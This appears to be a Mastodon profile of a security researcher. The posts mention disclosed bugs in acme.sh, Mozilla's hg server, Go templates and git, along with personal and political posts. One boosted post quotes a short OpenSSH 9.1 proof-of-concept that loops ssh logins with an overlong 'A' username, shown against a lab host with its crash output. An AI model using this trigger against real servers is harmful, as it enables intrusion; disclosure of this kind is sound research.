Profile for joern
About joern
Fields
- Website
- https://0day.click
- Threema
- https://threema.id/K8J68WTX
Bio
Your mom's favorite hacker!
My other account is @joernchen
- Joined
- Posts
- 687
- Followed by
- 1129
- Following
- 261
Stats
Recent public posts
exclude boostsConsidering giving a talk titled: „I made my hobby my profession so I needed a new hobby. Now I’m cuddling grown men in pyjamas trying to choke them out or break their limbs - for fun“
Against earlier statements it looks like I'll be at the CCC Camp with my family. See you all there!
#SchreinerManja und den manischen #Radweg-Wahn der #CDU stoppen? Komm morgen an die Demo! Gemeinsam zum roten Rathaus. 14 Uhr, Eberswalder Straße.
#ADFC #ChanginCities #FridaysForFuture #DerKlimablog #Klimakatastrophe #Zukunft #Sicherheit #Gesundheit
Well, I inadvertently discovered a zero-day RCE in acme.sh and got a Chinese CA to shut down overnight: https://github.com/acmesh-official/acme.sh/issues/4659
The other shell I got was via some funky LDAP truncation issue. Check out the write up at https://0day.click/recipe/pash/
Last Christmas I popped a shell¹ on http://hg.mozilla.org
Here's the fix:
https://hg.mozilla.org/hgcustom/version-control-tools/rev/0b02dd442661b4ada84e4c6dea58ab62cb8fbaca
Can you explain the bug?
FAQ:
- This is an authenticated vuln
- I'll post a writeup in the next days
- Yes, RTFM helps ... as usual
¹) actually it was two shells
Unpopular take: .zip domains were a marketing gag targeting security people.
We found some injection bugs in Go's html/template. That's to say stdlib-level XSS 
Stuff one finds buried in a shelf when moving ….
OR: Hot Single Sign Ons in your Collision Domain!
Hot Take: a lot of the "supply chain insecurity" news stories are not problems with the supply chain. So what if you managed to upload some crapware RAT to PyPi? No one will even use your malicious package ever. Even if you tried typosquating the package, the odds are still low that anyone important or a large chunk of the community would accidentally use your typosquated malicious package . Real supply chain issues are when a legitimate and *popular link in the supply chain (aka a popular library used by many other projects) becomes compromised.
This post by the Qualys Security Advisory team demonstrating rip/pc control on OpenSSH 9.1 (running on OpenBSD!) is savage: https://seclists.org/oss-sec/2023/q1/92
Here I was thinking this bug was hopeless and they one-line it without writing new code:
$ cp -i /usr/bin/ssh ./ssh
$ sed -i s/OpenSSH_9.1/FuTTYSH_9.1/g ./ssh
$ user=`perl -e 'print "A" x 300'` && while true ;do ./ssh -o NumberOfPasswordPrompts=0 -o Ciphers=aes128-ctr -l
"$user:$user" 192.168.56.123 ;done
...
#1 0x4141414141414141 in ?? ()
Happy Valentine's Day!
I've got a little something for you all right here https://github.com/git/git/security/advisories/GHSA-r87m-v37r-cwfh
💕 Patch your Gits 💕
